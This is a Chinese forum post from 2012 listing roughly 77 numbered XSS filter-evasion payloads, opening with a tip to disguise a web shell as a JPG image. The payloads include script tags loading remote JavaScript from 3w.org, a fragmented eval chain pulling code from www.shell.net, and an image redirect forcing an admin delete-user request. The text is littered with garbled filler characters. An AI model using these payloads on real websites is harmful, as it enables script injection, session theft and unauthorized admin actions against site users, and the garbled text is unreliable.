跨站图片shell
, K4 ?6 L& [6 `: }0 b2 s1 `# ?XSS跨站代码 <script>alert("")</script>
- M, t+ U# o; h1 @: [/ p8 c2 d. W- V
$ h6 t. j- k0 M& H2 K) J, X将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
: z- N; L& a. L* ^# _2 i2 n& \5 S2 h3 ^& Z
# P; i* d9 q% ]% Z7 V( X9 Y0 F. p
' \: S v o* m: x8 i" l1)普通的XSS JavaScript注入
t5 _8 @2 \2 r& T3 m Z0 x<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 t7 T% u2 N U8 s+ ` N! r, I
8 v- M- |1 E! n, }' p/ T' F0 [
(2)IMG标签XSS使用JavaScript命令- A, C# O. D* [' N8 l
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ |. @. w( k2 @" S4 t2 G/ ^2 x) {! t- t) `
(3)IMG标签无分号无引号
2 f3 h& \9 _' m2 M0 C- I<IMG SRC=javascript:alert(‘XSS’)>
) ^0 x# F4 H# P8 W( g O" l5 X, e5 h5 I. |! M6 [5 z
(4)IMG标签大小写不敏感' w/ z- X+ J% l1 O
<IMG SRC=JaVaScRiPt:alert(‘XSS’)># ?# F$ H# f x& h) ~
6 x4 ?5 i" K/ @(5)HTML编码(必须有分号)
& H8 V! k) G7 M<IMG SRC=javascript:alert(“XSS”)>( K9 f" o0 F+ @$ K: e* u6 u
3 _8 @; M% n' R$ W4 |' E. u5 n: o- R6 T
(6)修正缺陷IMG标签
8 G# j/ [0 k; v<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: H& t( n) r; {0 z& L: ?
% ~2 H+ ?/ T( }, p# B3 q% `(7)formCharCode标签(计算器)
9 h1 d4 M. d$ o7 N5 i<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( G4 H# H6 I: E' v: `
" w8 N+ O+ T5 Q(8)UTF-8的Unicode编码(计算器)
3 f+ M( q: Z! P7 S3 C8 q% q6 @<IMG SRC=jav..省略..S')>
" R$ \6 w4 d3 \. L' u' }4 o
/ G0 c2 l$ s7 n(9)7位的UTF-8的Unicode编码是没有分号的(计算器), X# V! ?7 k% m6 v1 E% u
<IMG SRC=jav..省略..S')>
/ ~+ |5 V# c+ S3 b: U6 a8 k' a# p3 C4 y5 `* G
(10)十六进制编码也是没有分号(计算器)
9 \3 z% `* k* N, e0 Q, g<IMG SRC=java..省略..XSS')>- D- n( Y! N9 r- Z' A1 F9 D
+ u! }. M% I' J5 n1 l8 c7 ` B5 S, s(11)嵌入式标签,将Javascript分开
: G; F' r, S) f! a1 C- q1 l/ J<IMG SRC=”jav ascript:alert(‘XSS’);”>$ l9 ` f, R' q
- k# H7 `, H: ]; A0 [
(12)嵌入式编码标签,将Javascript分开
7 I4 Z0 k5 z) o; C8 q% ] x Z' |) [<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 ?2 ^1 t: B# c: H E; I& E) Y6 J
$ \' O) Y. C" L5 u(13)嵌入式换行符7 {( N0 Y _( c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 h, \' R7 J. c8 E: }
9 }2 \+ ?6 t' c" o; M(14)嵌入式回车
6 O+ g! j5 W) d9 u Y) j0 ~<IMG SRC=”jav ascript:alert(‘XSS’);”>0 J- ?- `( X& b V" C2 ~
) I0 O2 e7 l% g C1 s; {; S4 }; @/ V {
(15)嵌入式多行注入JavaScript,这是XSS极端的例子8 R& q0 T5 O/ I7 i; T0 ?% S
<IMG SRC=”javascript:alert(‘XSS‘)”>
0 p7 U2 b4 w V4 q3 z0 [ w3 H0 x! t; z0 f' i A7 v, S
(16)解决限制字符(要求同页面)5 Y4 E4 G* r4 |& R/ G/ s" m- M
<script>z=’document.’</script>
C( L/ b* G* ~8 O) F+ i<script>z=z+’write(“‘</script>
) B& Y' S# m) s+ ^! u<script>z=z+’<script’</script>
: {; k' s6 a& H<script>z=z+’ src=ht’</script>8 p6 Q, E2 Y b( d0 }
<script>z=z+’tp://ww’</script>6 }( ^% i8 G; j3 v5 L4 ]
<script>z=z+’w.shell’</script>
/ K' k2 O* v6 [. o) C' L: W0 @4 Q& f<script>z=z+’.net/1.’</script>
" L# q, X! r$ v) K<script>z=z+’js></sc’</script>: _1 F3 d j; w6 M8 q: W* j
<script>z=z+’ript>”)’</script>
3 r$ k. Z7 P* n1 f1 h3 D1 |<script>eval_r(z)</script>) ?; X& ?7 t$ O( u" T/ k- ?$ G
) \- h7 r+ Q$ U' }* h; k' r(17)空字符6 I3 q" ~8 A; l0 j9 ~# x! ?! U
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" i6 L; ]: s3 G! ^) P& O% q6 G4 D/ ^6 j0 k1 J4 F( L9 `
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
" `. c+ Q* q; p- F* n. Uperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 x+ z. L9 E% f3 i. \' ? \7 {5 _5 ^3 _! r0 @! y8 [$ h9 ^6 A
(19)Spaces和meta前的IMG标签
) x8 J5 Z, s3 S' r1 M8 r- D<IMG SRC=” javascript:alert(‘XSS’);”>' ^" I& M8 ]0 \, |
5 R6 N" V3 e- {3 u, S' ]% o
(20)Non-alpha-non-digit XSS/ y2 j# G9 [- r- u
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>: e$ `+ S+ Z- r0 `9 z% u9 [
1 s* |* u* Q9 } E X; n! K(21)Non-alpha-non-digit XSS to 2
2 c, X' z1 n; F* L' q<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 g+ N5 J& b* k. X. c
) T0 F4 K6 P: w% N$ \(22)Non-alpha-non-digit XSS to 39 D' p' f, J6 P$ G( V; p
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
H' {- s" R* `5 I7 U X0 b; Y8 B: G) c0 q
(23)双开括号
. f; w# ^9 h3 ]" y<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ X0 B/ S6 A& C8 q. I
: z; P$ R! G# b- w6 b! t(24)无结束脚本标记(仅火狐等浏览器)
6 A" Q1 S4 x1 t, N5 |! h a4 U<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
8 T) Q( l' f2 q' z5 _: r' I) F5 P6 s# `
(25)无结束脚本标记27 v: W/ k: S G8 t
<SCRIPT SRC=//3w.org/XSS/xss.js>9 ]: H# K" s/ Z" B0 c
- i, w2 L1 t" \! R7 e+ A8 T. I7 J9 b
(26)半开的HTML/JavaScript XSS
& Q; H& j1 [6 u: @4 c<IMG SRC=”javascript:alert(‘XSS’)”4 G8 N3 W, A0 h1 W& p, D
1 a- T8 x9 r5 b(27)双开角括号
7 C4 P; z$ K: N5 S<iframe src=http://3w.org/XSS.html <( |1 N2 n9 U/ i9 w! R5 H- U5 ^/ W% j
% {- w% [! }6 _: E7 k' A6 C: d8 v(28)无单引号 双引号 分号
) y3 R$ p! G* N% L<SCRIPT>a=/XSS/
7 Z0 C- F- f0 Z- e9 |% b3 H2 c4 |/ aalert(a.source)</SCRIPT>9 I F) U* k: I' M+ e' a2 p
, H6 R. Z! N+ n- x# {+ u(29)换码过滤的JavaScript: Q* m5 L% w( g" p4 p: b' U/ w. g/ J
\”;alert(‘XSS’);//
( U/ ~9 S7 u( S- o* n+ {; V8 f4 D/ G+ W
(30)结束Title标签
" x2 \( t5 V: Q& z. Q0 y! t( u0 ^</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# m0 \1 h' v6 ? {( c. P9 j
+ a: ~& f' K/ n9 D8 |(31)Input Image) Y* a/ m' D( A
<INPUT SRC=”javascript:alert(‘XSS’);”>& u) b: U; y- h* k% J3 p
4 b# w9 s# i& v* A; o(32)BODY Image
0 ]+ t B( A2 T( h) n<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. B( H+ G, ^1 Z5 ~" V x
( q' J* [1 S# l(33)BODY标签
8 W* r& J! @4 H6 S! o0 n<BODY(‘XSS’)>
3 W) L( r4 P* X$ h4 l2 h5 j8 Q+ c9 t" Q6 x
(34)IMG Dynsrc: j& k8 s' Z8 Q5 W9 }; ]3 N
<IMG DYNSRC=”javascript:alert(‘XSS’)”>! U. U/ ?% B% j U6 p
1 w. B( Q8 ~2 H
(35)IMG Lowsrc
! |, j# w8 M1 c" g$ E<IMG LOWSRC=”javascript:alert(‘XSS’)”>3 I. v |9 J F, ~0 l% s: h
) O. b" y5 o! a+ T, W* ?) ~6 t
(36)BGSOUND
$ d3 ^6 V! l3 i7 s5 e: y7 p<BGSOUND SRC=”javascript:alert(‘XSS’);”>& y- v" O" P1 ~
0 q6 K; [6 |3 E' D4 A: J
(37)STYLE sheet
) T6 m! ]( E+ w' E5 H0 {* Y& k<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> J9 ~" I! U2 J0 U- s: M
5 A9 ^ ]. x- ? N2 p& l, w(38)远程样式表
. S2 s7 D, R* N/ I8 ~" j<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. z2 |# F. ]7 q( C6 C5 r: T; [
8 K+ J) V6 A/ P- T0 I(39)List-style-image(列表式)
9 m8 @# J( D; \( J% u: t" h<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS+ {% V: ?; Z9 Q# W( d( P
3 s; b H* M# S4 ](40)IMG VBscript, A7 @: f7 F; @2 u. F1 w
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 S5 R. Z4 }/ ^) z6 x1 V1 g
5 D7 m& L5 } ~& l
(41)META链接url3 E. K1 U$ ?- f' L) n5 P
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
7 a- I# E: Z3 _& l8 n
" Y2 S8 t3 y( Q# U" N" l& q3 a1 {(42)Iframe, \3 v! i/ r& p. M. X0 \8 b
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>. S. J0 n% t' r* w" @9 p8 ~
(43)Frame
3 n9 b& l$ q$ p/ x; k- q. D6 o<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
4 o) A9 y4 j" a4 \: K g
0 T1 d9 J" |9 F0 [1 x! I(44)Table* [1 A4 S( `; A$ Q' U r% z
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
3 y9 f \( X# m2 M+ R; B4 h9 l( I; r; ^. u& F4 [2 T" K. f# J$ A- T# b3 A
(45)TD
$ e9 T. n& `. [# d2 W7 R<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ \" G3 I6 E1 K) ?2 b' }# f) x2 U
(46)DIV background-image
G. K, J* B, Y. {. ~<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 g% U% @* N6 g5 N5 v& D2 t
; G; Q ?" B3 |# x7 L% G; R
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
; q8 q/ U- O; s! T<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>. H5 U8 O5 W6 h# n6 m: B5 n7 n
# z; n/ b* k! A5 @
(48)DIV expression8 A8 T2 K) c }; ?3 G* j h& g( p
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ r. E( b& |1 |, w8 d, `& } q- ?* x# P$ U5 w3 E# n" m- }
(49)STYLE属性分拆表达
4 h- r2 f. |6 V$ s% E1 Y<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
w+ }7 ~9 d4 P# C' h- m
7 C0 s0 \& n% I9 `6 V5 V( K(50)匿名STYLE(组成:开角号和一个字母开头)$ \- g/ _* {: i4 d8 [ `
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
8 c; v/ ^6 h0 b! j
5 O/ A5 |5 N7 {+ T% i(51)STYLE background-image
( m* ^! m. Z4 M8 |% P, w! L<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
2 L" K! x, |5 i: b! o& \7 z0 F. |- N) R! L) H
(52)IMG STYLE方式9 t2 E, x& P' N) D; X6 ~1 P
exppression(alert(“XSS”))’>
9 \, m) `) o/ {+ C) y) E7 W, y# j: v; P' C& U8 D
(53)STYLE background
! H1 G- U! L; H. H<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 q" `( {' Z; k2 z5 _" T+ V0 t+ Q/ ]
(54)BASE; Q# V' o0 f+ z! [8 ^8 f. @
<BASE HREF=”javascript:alert(‘XSS’);//”>7 u' K! A% p) z5 `5 M9 H. {
. y2 _/ h3 y0 V3 {+ t; l' [
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS7 y1 P7 V! @) h
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 g4 ?; I5 G' u3 Q, J( u! D- ]1 [4 {7 r* C
(56)在flash中使用ActionScrpt可以混进你XSS的代码
' P" \ H) E0 `3 u+ v9 ?a=”get”;, a& F9 V4 k! N& i
b=”URL(\”";
5 e P. |* o1 A7 Oc=”javascript:”;7 c t- u% C! x0 J9 L: ~$ n+ ]. `/ q
d=”alert(‘XSS’);\”)”;
# F- Z# _% ^. v) S& S) beval_r(a+b+c+d);
% m6 a# @+ O) G5 [! Y& H
4 X q0 n+ \) r' H% K; r2 d(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
L3 v. l5 p4 D7 {6 n<HTML xmlns:xss>1 A& [* ^' A! T+ z: Q2 U
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>( W$ z, p# e( a; E# r& p
<xss:xss>XSS</xss:xss>( V/ ]0 k$ L. I
</HTML>4 O5 O& M. ~3 N) B7 s3 r
e/ b9 E9 \) p(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* W$ a$ f k' C6 u5 D: @<SCRIPT SRC=””></SCRIPT>
" J! F# {- v$ |, ~6 p
; |2 s; E, n* s(59)IMG嵌入式命令,可执行任意命令
/ Z8 b: S9 a* T<IMG SRC=”http://www.XXX.com/a.php?a=b”>' O# k+ N; j$ M, W, K
) T" S; g& w8 X. y) `& ^7 K2 |) Z9 i0 i(60)IMG嵌入式命令(a.jpg在同服务器)3 d8 l" V: ]& l3 M5 r1 W% V1 T2 s
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- f5 @+ K/ E8 I Z6 P( D' @
- B6 L s: r J4 ~; P* K$ r(61)绕符号过滤! h Q2 f: z( i+ b
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>: ~" _- e6 m6 C0 I9 H' S/ m
- B. F2 I# K/ u; N3 X
(62)
# W/ f: b4 i' j6 w: h<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 k; T' L. e3 {1 a- L# e( N! h$ c. F9 k6 t* `" O: f' ]. S4 f
(63)2 z+ Z$ ] [( m [
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 v* _' l* v' n: T, W
; v( m( a5 ?" p5 l' U% t2 A(64)
1 |- m; _9 D) Q2 F<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( J! x% e8 c: {5 R- ]/ E: M
& a" e6 q2 R6 Y7 ~- a9 \5 f Y7 u! x% o
(65)$ G9 P2 x5 \, Y$ p6 n/ `6 A) ]
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
6 G3 o- w( o8 m; o
; ~( ]2 z+ x' t' k) l5 [(66). A. ]! F; G% B
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># x- k3 E0 Q/ h" g& ?+ W6 g) P
/ O$ n# U+ `; s5 O5 `- c5 }2 o! w- z(67)
2 d' G+ M/ Z ?/ q& s<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
; q4 B; L8 N5 Z5 w4 ~
& K, _$ k# N0 t9 F(68)URL绕行4 J0 V/ r0 s z
<A HREF=”http://127.0.0.1/”>XSS</A>* I, Y8 {! ?5 R: L) j; K" K& _
9 d( p, q- T7 ~4 A9 J
(69)URL编码
9 @3 A; g7 M7 q5 \- I<A HREF=”http://3w.org”>XSS</A>1 n/ ]1 ?% ], p2 h8 D
+ E, y3 u/ n1 k/ b/ ]$ f
(70)IP十进制 H( t+ c- n1 ]0 \" ^
<A HREF=”http://3232235521″>XSS</A>& { y1 J# ~- X: j2 V
+ u# c2 z5 g; ?; U, k. V(71)IP十六进制! z, {/ C& H2 h, n9 \4 B* P
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 s4 D4 I) ?! g' g) \3 m7 V" C* X: L
(72)IP八进制
1 j: t( [2 u7 R$ w<A HREF=”http://0300.0250.0000.0001″>XSS</A># j2 N& N N8 N) I/ P
+ c* P+ ]. C# \8 N
(73)混合编码
2 @2 j; P3 F, O! ~6 |<A HREF=”h
8 s6 o9 B9 _: h! Jtt p://6 6.000146.0×7.147/”">XSS</A>6 D# x9 Q0 i$ G( m2 S; p
9 M2 I# w7 s4 t9 F- z' S! K3 i* h
(74)节省[http:]4 w& K5 m4 v3 o! k3 a# x
<A HREF=”//www.google.com/”>XSS</A>
. m5 d; h3 ]- p; Q) \ s4 z- L' j* q8 Y# v& A1 P
(75)节省[www]
5 M8 H) ~* E0 K/ e" @<A HREF=”http://google.com/”>XSS</A>0 T) w& K' n" B
/ n* D) `3 H. y(76)绝对点绝对DNS
2 h0 Q6 Z$ [! a+ |0 z) ?) f<A HREF=”http://www.google.com./”>XSS</A>
6 @/ C5 Y3 e$ b' T: Y2 M9 a( {/ ]/ B1 O6 l
(77)javascript链接
: N. r. Q6 l2 w$ }<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
/ u. [8 v7 I1 Z7 B( @; |8 f |
发表于 2012-9-13 17:04:56
收藏
支持
反对